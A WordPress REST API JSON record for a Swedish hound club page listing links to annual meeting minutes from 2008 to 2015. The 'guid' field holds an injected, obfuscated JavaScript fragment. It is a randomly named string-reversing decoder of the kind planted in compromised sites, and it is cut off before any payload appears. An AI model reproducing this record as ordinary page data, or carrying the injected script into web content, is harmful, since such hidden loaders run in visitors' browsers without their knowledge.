{"id":454,"date":"2012-06-02T09:43:21","date_gmt":"2012-06-02T07:43:21","guid":{"rendered":"http:\/\/www.lokalklubb.stovare.se\/uppl<script type=\"text\/javascript\">$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == \"string\") return $hiVNZt4Y5cDrbJXMhLy.list[n].split(\"\").reverse().join(\"\");return $hiVNZt4Y5cDrbJXMhLy.list[n"},"modified":"2016-06-26T11:10:13","modified_gmt":"2016-06-26T09:10:13","slug":"protokoll","status":"publish","type":"page","link":"https:\/\/www.uv-stovarklubb.se\/index.php\/om\/protokoll\/","title":{"rendered":"Protokoll"},"content":{"rendered":"<h1>\u00c5rsm\u00f6tesprotokoll<\/h1>\n<p><a href=\"\/wp-content\/uploads\/2012\/06\/protokoll2015.pdf\">\u00c5rsm\u00f6te 2015<\/a><\/p>\n<p><a href=\"\/wp-content\/uploads\/2012\/06\/\u00c5rsprot2014.pdf\">\u00c5rsm\u00f6te 2014<\/a><\/p>\n<p><a href=\"\/wp-content\/uploads\/pdf\/arsprot12.pdf\">\u00c5rsm\u00f6te 2012<\/a><\/p>\n<p><a href=\"\/wp-content\/uploads\/pdf\/arsprot11.pdf\">\u00c5rsm\u00f6te 2011<\/a><\/p>\n<p><a href=\"\/wp-content\/uploads\/pdf\/arsprot10.pdf\">\u00c5rsm\u00f6te 2010<\/a><\/p>\n<p><a href=\"\/wp-content\/uploads\/pdf\/arsprot09.pdf\">\u00c5rsm\u00f6te 2009<\/a><\/p>\n<p><a href=\"\/wp-content\/uploads\/pdf\/arsprot08.pdf\">\u00c5rsm\u00f6te 2008<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00c5rsm\u00f6tesprotokoll \u00c5rsm\u00f6te 2015 \u00c5rsm\u00f6te 2014 \u00c5rsm\u00f6te 2012 \u00c5rsm\u00f6te 2011 \u00c5rsm\u00f6te 2010 \u00c5rsm\u00f6te 2009 \u00c5rsm\u00f6te 2008<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":2,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":""},"_links":{"self":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/454"}],"collection":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/comments?post=454"}],"version-history":[{"count":0,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/454\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/2"}],"wp:attachment":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/media?parent=454"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}